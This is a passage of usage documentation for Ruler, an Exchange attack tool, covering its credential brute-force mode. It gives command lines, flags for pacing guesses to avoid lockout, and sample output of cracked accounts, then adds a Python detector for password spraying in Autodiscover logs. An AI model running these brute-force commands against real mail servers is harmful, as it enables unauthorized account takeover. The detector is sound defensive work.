Brute Force
While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:
- Autodiscover deployed over HTTP and not HTTPS (we default to HTTPS as this is more common)
- No autodiscover DNS record
- Authentication failing
If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:
./ruler --url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml
If you run into issues with authentication (and you know the creds are correct), you can try to force the use of basic authentication with the global --basic flag.
The global --verbose flag will also give you some insight into the process being used by the Autodiscover service.
If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.
./ruler --domain targetdomain.com brute --users /path/to/user.txt --passwords /path/to/passwords.txt
You should see your brute-force in action:
./ruler --domain evilcorp.ninja --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose
[*] Starting bruteforce
[x] Failed: bob.dole:P@ssw0rd
[x] Failed: george.bush:P@ssw0rd
[x] Failed: bill.clinton:P@ssw0rd
[x] Failed: bob.dole:August2016
[x] Failed: george.bush:August2016
[+] Success: bill.clinton:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: bob.dole:Evilcorp@2016
[x] Failed: george.bush:Evilcorp@2016
[x] Failed: bob.dole:3V1lc0rp
[x] Failed: george.bush:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: george.bush:Password1
[+] Success: bob.dole:Password1
Alternatively, you can specify a userpass file with the --userpass option. The userpass file should be colon-delimited with one pair of credentials per line:
$ cat userpass.txt
bill.clinton:August2016
george.bush:Password!2016
bob.dole:Password1
./ruler --domain evilcorp.ninja --insecure brute --userpass userpass.txt -v
[*] Starting bruteforce
[+] Success: bill.clinton:August2016
[x] Failed: george.bush:Password!2016
[+] Success: bob.dole:Password1
There are a few other flags that work with brute. These are:
- --stop //stop on the first valid username:password combo
- --delay //how long to wait between multiple password guesses
- --attempts //how many attempts before we delay (attempts per user)
- --insecure //if the Exchange server has a bad SSL certificate
- --verbose //be verbose and show failed attempts
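From the defender's side, the --attempts and --delay behaviour above keeps each account under its lockout threshold, so detection has to look across accounts per source rather than per account. The following is an added example, not part of Ruler or the original page, that flags a source whose failed Autodiscover logins touch many distinct accounts inside one time window; the log format, IP addresses, function names and thresholds are all assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (assumed format, not a real Exchange/IIS layout):
# ISO timestamp, source IP, username, HTTP status of the Autodiscover request.
SAMPLE_LOG = """\
2016-08-01T10:00:01 203.0.113.7 bob.dole 401
2016-08-01T10:00:02 203.0.113.7 george.bush 401
2016-08-01T10:00:03 203.0.113.7 bill.clinton 401
2016-08-01T10:00:04 203.0.113.7 bob.dole 401
2016-08-01T10:00:05 203.0.113.7 george.bush 401
2016-08-01T10:00:06 203.0.113.7 bill.clinton 200
2016-08-01T10:05:00 198.51.100.20 alice.smith 401
2016-08-01T10:05:30 198.51.100.20 alice.smith 401
2016-08-01T10:06:10 198.51.100.20 alice.smith 200
"""

def parse(log_text):
    """Yield (timestamp, source_ip, username, status); skip malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        try:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2], int(parts[3])
        except ValueError:
            continue  # unparseable timestamp

def detect_spray(log_text, window=timedelta(minutes=30), min_users=3):
    """Flag sources whose 401s hit >= min_users distinct accounts in one window.
    Returns {source_ip: {"users": failed accounts, "successes": accounts to reset}}."""
    failures, successes = defaultdict(list), defaultdict(set)
    for ts, ip, user, status in parse(log_text):
        if status == 401:
            failures[ip].append((ts, user))
        elif status == 200:
            successes[ip].add(user)
    alerts = {}
    for ip, events in failures.items():
        events.sort()
        widest = set()
        for i, (start, _) in enumerate(events):
            # Distinct accounts failing within `window` of this event.
            users = {u for t, u in events[i:] if t - start <= window}
            widest = max(widest, users, key=len)
        if len(widest) >= min_users:
            alerts[ip] = {"users": sorted(widest), "successes": sorted(successes[ip])}
    return alerts
```

A single user mistyping a password (the second source in the sample) stays below the distinct-account threshold and is not flagged.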